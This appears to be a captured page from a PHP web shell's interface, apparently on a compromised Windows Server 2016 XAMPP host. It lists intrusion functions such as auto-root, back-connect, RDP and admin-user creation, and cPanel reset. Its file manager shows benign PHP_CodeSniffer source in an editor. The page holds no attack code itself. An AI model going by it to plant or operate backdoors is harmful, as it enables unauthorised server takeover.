Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
CodeSniffer /
Reports /
[ HOME SHELL ]
Name
Size
Permission
Action
Checkstyle.php
3.18
KB
-rw-rw-rw-
Csv.php
2.37
KB
-rw-rw-rw-
Emacs.php
2.24
KB
-rw-rw-rw-
Full.php
4.87
KB
-rw-rw-rw-
Gitblame.php
3.22
KB
-rw-rw-rw-
Hgblame.php
3.25
KB
-rw-rw-rw-
Source.php
6.21
KB
-rw-rw-rw-
Summary.php
4.2
KB
-rw-rw-rw-
Svnblame.php
2.41
KB
-rw-rw-rw-
VersionControl.php
6.93
KB
-rw-rw-rw-
Xml.php
3.31
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Hgblame.php
<?php /** * Mercurial report for PHP_CodeSniffer. * * PHP version 5 * * @category PHP * @package PHP_CodeSniffer * @author Ben Selby <benmatselby@gmail.com> * @copyright 2009 SQLI <www.sqli.com> * @copyright 2006-2011 Squiz Pty Ltd (ABN 77 084 670 600) * @license http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence * @link http://pear.php.net/package/PHP_CodeSniffer */ /** * Mercurial report for PHP_CodeSniffer. * * PHP version 5 * * @category PHP * @package PHP_CodeSniffer * @author Ben Selby <benmatselby@gmail.com> * @copyright 2009 SQLI <www.sqli.com> * @copyright 2006-2011 Squiz Pty Ltd (ABN 77 084 670 600) * @license http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence * @version Release: 1.3.3 * @link http://pear.php.net/package/PHP_CodeSniffer */ class PHP_CodeSniffer_Reports_Hgblame extends PHP_CodeSniffer_Reports_VersionControl { /** * The name of the report we want in the output * * @var string */ protected $reportName = 'MERCURIAL'; /** * Extract the author from a blame line. * * @param string $line Line to parse. * * @return mixed string or false if impossible to recover. */ protected function getAuthor($line) { $blameParts = array(); $line = preg_replace('|\s+|', ' ', $line); preg_match( '|(.+[0-9]{2}:[0-9]{2}:[0-9]{2}\s[0-9]{4}\s.[0-9]{4}:)|', $line, $blameParts ); if (isset($blameParts[0]) === false) { return false; } $parts = explode(' ', $blameParts[0]); if (count($parts) < 6) { return false; } $parts = array_slice($parts, 0, (count($parts) - 6)); return trim(preg_replace('|<.+>|', '', implode($parts, ' '))); }//end getAuthor() /** * Gets the blame output. * * @param string $filename File to blame. * * @return array */ protected function getBlameContent($filename) { $cwd = getcwd(); if (PHP_CODESNIFFER_VERBOSITY > 0) { echo 'Getting MERCURIAL blame info for '.basename($filename).'... '; } $fileParts = explode('/', $filename); $found = false; $location = ''; while (empty($fileParts) === false) { array_pop($fileParts); $location = implode($fileParts, '/'); if (is_dir($location.'/.hg') === true) { $found = true; break; } } if ($found === true) { chdir($location); } else { echo 'ERROR: Could not locate .hg directory '.PHP_EOL.PHP_EOL; exit(2); } $command = 'hg blame -u -d -v '.$filename; $handle = popen($command, 'r'); if ($handle === false) { echo 'ERROR: Could not execute "'.$command.'"'.PHP_EOL.PHP_EOL; exit(2); } $rawContent = stream_get_contents($handle); fclose($handle); if (PHP_CODESNIFFER_VERBOSITY > 0) { echo 'DONE'.PHP_EOL; } $blames = explode("\n", $rawContent); chdir($cwd); return $blames; }//end getBlameContent() }//end class ?>
Close